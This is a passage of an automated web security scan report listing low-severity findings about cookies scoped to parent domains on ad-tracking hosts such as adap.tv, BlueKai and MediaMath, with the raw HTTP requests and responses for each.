Cookie: uid=db77f2e7-27f9-4223-8780-7287dc87810a; partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; uid=dcb84907-869e-4e7d-baf7-9761469e8965; segments_p1=eJzjYuF4vJaJi5mjMYILyJzACCSf9zMCBU5yAImmCCDxD8T67wOUWf8BJLORAwBSdgyC

Response

HTTP/1.1 302 Found
Date: Sat, 09 Apr 2011 13:54:17 GMT
Set-Cookie: segments_p1=eJzjYuF4vJaJi5mjMYKLheN5PyOQfDyBEShwkgNINEUAiX8g1n8fILGRAwAJqArM;Path=/;Domain=invitemedia.com;Expires=Sun, 08-Apr-2012 13:54:17 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/unpixel?id=1062338&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

5.137. http://segments.adap.tv/data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data?p=quantcast-adaptv&type=gif&segment=D,T&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8; adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A02"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"24\":{\"f\":1304924400,\"e\":1304924400,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
5.138. http://segments.adap.tv/data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=newsinc-quantcast&type=gif&segment=D,T HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8; adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A02"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"13\":{\"f\":1304924400,\"e\":1304924400,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
5.139. http://server.iad.liveperson.net/hc/47227738/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/47227738/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/47227738/?&site=47227738&cmd=mTagStartPage&lpCallId=702605261700-405870079528&protV=20&lpjson=1&page=http%3A//www.clickability.com/&id=7001425185&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=1&title=Clickability%20%7C%20www.clickability.com%20%7C%20SaaS%20Web%20Content%20Management%20System%20%28WCM%29%20for%20Enterprises&cookie=cc%3Dt%3B%20_vt_%3DNGJjOTVmNjMxNWNmOWMzMzQyMGVhYjVjMTZmZDlkZTM%253D%3B%20__utmz%3D226774607.1302308285.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20__utma%3D226774607.1949955237.1302308285.1302308285.1302308285.1%3B%20__utmc%3D226774607%3B%20__utmb%3D226774607.1.10.1302308285%3B%20vmVisitorState%3D0%3B%20vmSessionId%3D2FE6582E07B2ABC36A24B66685F3E6E3%3B%20click_mobile%3D0%3B%20__ar_v4%3D%257C24H2I4YFKNA3JHF7DBOLEQ%253A20110409%253A1%257CJ2XVQLHIHRDGBKODSAL526%253A20110409%253A1%257CNT4ZDKY4VNBDLG4GSD4LKH%253A20110409%253A1 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=2919698114099460296; LivePersonID=LP i=48701824114,d=1301944418; HumanClickACTIVE=1302308296399

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_47227738=STANDALONE; path=/hc/47227738
Set-Cookie: LivePersonID=-48701824114-1302308297:-1:-1:-1:-1; expires=Sun, 08-Apr-2012 00:18:32 GMT; path=/hc/47227738; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 09 Apr 2011 00:18:32 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 6321

lpConnLib.Process({"ResultSet": {"lpCallId":"702605261700-405870079528","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!tagToBrowser_compact.js", "js_code": "function lpTagToBrowser(src,type,ch
...[SNIP]...
5.140. http://sync.adap.tv/sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync?type=gif&key=tidaltv&uid=bf84cb16-bb4c-4b62-acfc-f9edb82529ad HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8; adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A02"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-3998873301156420199__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: rtbData0="key=tidaltv:value=bf84cb16-bb4c-4b62-acfc-f9edb82529ad:expiresAt=Wed+Jun+08+05%3A31%3A05+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-2042 14:17:45 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;
5.141. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F684339%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=10004:1301797090; uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b; ts=1301951211

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x3 pid 0x3ede 16094
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 09 Apr 2011 12:35:47 GMT
Location: http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b
Etag: 4d97b063-cd55-fcc9-f79b-3dc3c331fd5b
Connection: Keep-Alive
Set-Cookie: ts=1302352547; domain=.mathtag.com; path=/; expires=Sun, 08-Apr-2012 12:35:47 GMT
Content-Length: 0

5.142. http://sync.tidaltv.com/adaptv.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.tidaltv.com
Path:   /adaptv.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adaptv.ashx HTTP/1.1
Host: sync.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 09 Apr 2011 12:31:05 GMT
Location: http://sync.adap.tv/sync?type=gif&key=tidaltv&uid=f0a5911f-4232-4b31-8480-675d914667c4
Server: Microsoft-IIS/6.0
Set-Cookie: tidal_ttid=f0a5911f-4232-4b31-8480-675d914667c4; domain=tidaltv.com; expires=Sun, 09-Apr-2028 12:31:05 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 211
Connection: keep-alive

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://sync.adap.tv/sync?type=gif&amp;key=tidaltv&amp;uid=f0a5911f-4232-4b31-8480-675d914667c4">here</a>.</h2>
</bod
...[SNIP]...
5.143. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=13750&pi=-&xs=3&pu=http%253A//www.wptz.com/index.html%253Fifu%253D&df=1&v=5.5&cb=48124 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZwZmJ1dDFkNDVpdW4=; ANRTT=53615^1^1302399365|57125^1^1302391406|60197^1^1302391477|52576^1^1302399365|52766^1^1302399365; TData=99999|^|60740|60489|60515|60514|52615|53656|57130|52766|56988|60197|56969|52576|56835|57129|56732|56830|56768|53575|#|53615|57125; N=2:705df1d2c9325c0834b34815bcd5513e,705df1d2c9325c0834b34815bcd5513e; ATTAC=a3ZzZWc9OTk5OTk6NjA3NDA6NjA0ODk6NjA1MTU6NjA1MTQ6NTI2MTU6NTM2NTY6NTcxMzA6NTI3NjY6NTY5ODg6NjAxOTc6NTY5Njk6NTI1NzY6NTY4MzU6NTcxMjk6NTY3MzI6NTY4MzA6NTY3Njg6NTM1NzU6NTM2MTU6NTcxMjU=; JEB2=4D97D4AE6E651A440C6EAF39F0006986

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:56 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 09 Apr 2011 12:44:56 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZwZmJ1dDFkNDVpdW4=; path=/; expires=Tue, 03-Apr-12 12:29:56 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1302399365|57125^1^1302391406|60197^1^1302391477|52576^1^1302399365|52766^1^1302399365|50213^1^1302956996; path=/; expires=Sat, 16-Apr-11 12:29:56 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1302352196^1302353996|13750^1302352196^1302353996; path=/; expires=Sat, 09-Apr-11 12:59:56 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60740|60489|56282|56263|60515|56229|60514|52615|53656|57130|52766|50213|60197|56969|56988|56835|57129|56732|56830|52576|53575|56768|#|53615|57125; expires=Tue, 03-Apr-12 12:29:56 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:705df1d2c9325c0834b34815bcd5513e,e295433643eb8b3496aef1faaa47ba8c; expires=Tue, 03-Apr-12 12:29:56 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3NDA6NjA0ODk6NTYyODI6NTYyNjM6NjA1MTU6NTYyMjk6NjA1MTQ6NTI2MTU6NTM2NTY6NTcxMzA6NTI3NjY6NTAyMTM6NjAxOTc6NTY5Njk6NTY5ODg6NTY4MzU6NTcxMjk6NTY3MzI6NTY4MzA6NTI1NzY6NTM1NzU6NTY3Njg6NTM2MTU6NTcxMjU=; expires=Tue, 03-Apr-12 12:29:56 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=1; path=/; expires=Sun, 08-Apr-12 12:29:56 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 248
Content-Type: application/x-javascript
Content-Length: 248

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16pfbut1d45iun';
var ANSL='99999|^|60740|60489|56282|56263|60515|56229|60514|52615|53656|57130|52766|50213|60197|56969|56988|56835|57129|56732|56830|
...[SNIP]...
5.144. http://tags.bluekai.com/ids  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /ids

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ids?dest=132&id=a53875b5-a877-4a03-ad1a-e28c70299475 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/bkdp.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==; bklc=4da32a72; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KbhVmyn9WqYO4X=; bk=7Snj3K+7kTPVmCfH; bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxbIEiGWqz2gekRmBsmEM1QjPN//3uqEPv0D7jgztUysKxihH3O0Am0Fm1l+k8lL16XtFIdlgKopK6QJz9VOrXXaN1/0E4M6M4sufjcP2kQPRn3J/PWc+0H8gptCLrT9yGf1b4JtbrxFMS1wKNMlB9kbFQgJykcCba1mKN2XCH+XneEmCqYYhttpe7+U+fQsv4yZFIBmbpldGCpck+Nb1r744p+o8TSNtbRoMftizjIkTYcCLNlXBOf9defTSeQgHgIc+YmMnXjwCGEwgx11dnpovg+v27t+20Lhqwp8bkJtlmSdFAcNrC7cJIY1vzN286SwTiLJM0QiN5uMZiIfPwXdytmL8XxUQrJXN2fDFbPbefNW88lee7+El3l2EI2ba5loSK3AMpVdLwuNqYKx==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 11 Apr 2011 17:31:24 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=qkWMkm+7kTPVmCfH; expires=Sat, 08-Oct-2011 17:31:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56g2vyN9DOF9FdSBJ3bdQoACHyxbiaxxUO0siVTKYQ6DlOxKcek3heG3YQgxGaREiJBCYXxD03LXQniJGGPDH5O9XJIV6mUz/0R2XlIUz0dPixJXcBa/PNynQAV4itok/NIDxXJReBC1PNXSzfXzhfx4elO446cgNmkO/+B5MEI2gzNbXqxwHRxLcuNz5NpSQ4srRII/ptArwqusb4+7hbeiDmuXIJn5bnEpBk26xziat6pe7hxw2xcgxy7F0yrIps6Bx8gpR53CnIdtbwI2T56Lfq8MfTZvRFkKO8tgJ5UeLI2wyCIazu+LtdemklEnXRFC6xFFW11dnMoWn5abF5c8g+j/dwlrO7398nlqJFhWntRYE/NeZFcQ7uFm7QjV9k0wSZROq5nImSJbdS+4Cq0QFhgV8nfbZ40ZbEXt9JyNpUrhxdbfDwQ2h5A2fB3dBqdWdJAf1Zx==; expires=Sat, 08-Oct-2011 17:31:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkAnNvOeWDCPmLY/TdCSPQjULC0ztFluYMngMvLihi/60uiS9TtfQLVFL/QiORiRtBFGcG9TMFGS9F/Jiju+ptm2X8Usbcw1XH1AFs2DA2Z+ucq2K2e7ZjH3XJgjauG+cuuuiBNiOvik9sPAnaM5KDV0r6da0dudfflT7X3j7TEZijGeu1Vi7xvW8HvLwjpt1EntPEMPfVB+YiR+y3pShQ0/DxGR6FLIRZWShtPYcT/YPWf0NWqHNQXmQHVxpucqUIPKrfu/10lAWSLi93sz9TEAWGaApkMSxKjIgq8BX74TPL81VQ09FLhIcVdQVGQ0WKftpF7r57GbdtXBDaxrqJjvdRwmtwrtULeMfTEK/widIII9rigVeM; expires=Sat, 08-Oct-2011 17:31:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 12-Apr-2011 17:31:24 GMT; path=/; domain=.bluekai.com
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
5.145. http://tags.bluekai.com/site/2174  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2174

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2174 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101U8+B1LU9WQSOAX=; bk=D6aZAr+7kTPVmCfH; bkc=KJh56gav96WxOrOdATr8ud9PfWyPYN1WEVzqmna1WDiHGJtkHHGMhARDaW/mHDFgtwQuwGERi/PYpQHOYXsjApWfDh0fcdFd19ylvQBnGDBCdpjt9WqA+UDG+TmaEXko6KsoKHw761IhoXSzabXL9bNPCf4S55j7FNKQpckhsaclOJQdUFlfbWOfR1h2XECw2NlQKjnWWzTppTydMwLBf5eTSN1fBUThF3hgUhMpFmyuKDMfK3U2f567t4pLq4oXzNTzAfXeC8f7VCUv7Oz4aZMIa+eNl9Z6t8fEW7OsXdh1aL8dx7Z7g1N2XHt2BKCdZ7gK1mSXmvnIxdvlelcFVc+gG1t7IO4lnj2K; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==

Response

HTTP/1.0 200 OK
Date: Sat, 09 Apr 2011 12:31:05 GMT
Set-Cookie: bklc=4da05189; expires=Mon, 11-Apr-2011 12:31:05 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sun, 10 Apr 2011 12:31:05 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=BIMCvr+7kTPVmCfH; expires=Thu, 06-Oct-2011 12:31:05 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56gav96WxOrOdApr2ud9PfOxnnDyCZL8VmBWrHzeYGJNtaikiHY6DOxUhDOHLqW6SUXvcWOrhD1ioYaG/poh1LMwaL4rhdydezv6/YYzzeojFWQKQHK8rxF7mrOT14aRsCivczmmbfbkovcBK4WMmCC6Kabbu9oGa5LIRXInHWS9t8FOSrzpffn5hvcBKc1UDlxzIc0fbl+7uqC+pUlhKowLSXBHJAhMcrEI1lTtqPKl/Ic+mmpBIBMb56ETh877jJ4/KfKra2g4KE4w8tRF6IKSXmYcdO9TBp8PJvcBKFOludePQN4BvGall7JV9/8g7+pByXxFvutP+fG+FbSNvdNwwXbyh8XDh2KdEdlt/sfFSXtN+wLPditSgR9==; expires=Thu, 06-Oct-2011 12:31:05 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 10-Apr-2011 12:31:05 GMT; path=/; domain=.bluekai.com
BK-Server: 1ae0
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
5.146. http://tags.bluekai.com/site/2731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
